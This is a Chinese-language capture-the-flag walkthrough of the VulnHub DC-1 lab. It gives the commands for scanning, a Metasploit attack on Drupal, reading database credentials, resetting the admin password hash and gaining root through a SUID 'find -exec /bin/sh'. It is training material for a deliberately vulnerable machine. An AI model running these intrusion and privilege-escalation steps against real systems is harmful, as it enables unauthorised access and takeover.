vulnhub--DC1

一.信息收集
扫存活主机

arp-scan -l

vulnhub--DC1_第1张图片
扫描靶场开放端口

nnap -sS -v 192.168.111.130

vulnhub--DC1_第2张图片查看80端口

vulnhub--DC1_第3张图片二.漏洞利用
msf攻击

vulnhub--DC1_第4张图片
vulnhub--DC1_第5张图片
拿到meterpreter以后查看当前目录,发现flag1.txt,cat得到flag1

vulnhub--DC1_第6张图片
根据flag1的提示百度,得到Drupal的数据库配置文件在sites/default/settings.php

vulnhub--DC1_第7张图片
cat setting.php得到flag2.txt

vulnhub--DC1_第8张图片
三.提权
接下来可以从mysql入手,先溢出提权,得到一个交互式shell

python -c ‘import pty;pty.spawn(“/bin/sh”)’

请添加图片描述
再根据已知用户密码连接mysql

mysql -udbuser -pR0ck3t

vulnhub--DC1_第9张图片
接下来show库show表
vulnhub--DC1_第10张图片
在show表的时候发现users表

vulnhub--DC1_第11张图片

发现用户密码被hash加密了,百度查找后了解到Drupal的加密脚本在根目录的scripts中,可以生成一个密码来重置管理员密码。
加密脚本

./scripts/password-hash.sh 333333

请添加图片描述

更新管理员密码

请添加图片描述
接下来就可以用密码登录网站了,在content中找到flag3

vulnhub--DC1_第12张图片
发现关键词passwd,进入ect目录查看,果然有passwd

vulnhub--DC1_第13张图片
打开发现flag4在home目录中,进入/home/flag4目录中找到flag4.txt文件

vulnhub--DC1_第14张图片
刚开始看了flag4提示没有头绪,后来看了其他大佬的wp才知道能用suid提权

suid的作用:用于执行文件,以文件的拥有者的身份运行该文件。 chmod u+s 文件名

以下命令可以发现系统上运行的所有SUID可执行文件。

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm-4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

发现find命令有root权限

vulnhub--DC1_第15张图片

用find提权,成功获得root权限

find / name flag4 -exec “/bin/sh” ;

请添加图片描述

打开root目录发现最后一个flag

vulnhub--DC1_第16张图片

你可能感兴趣的:(数据库,php,安全)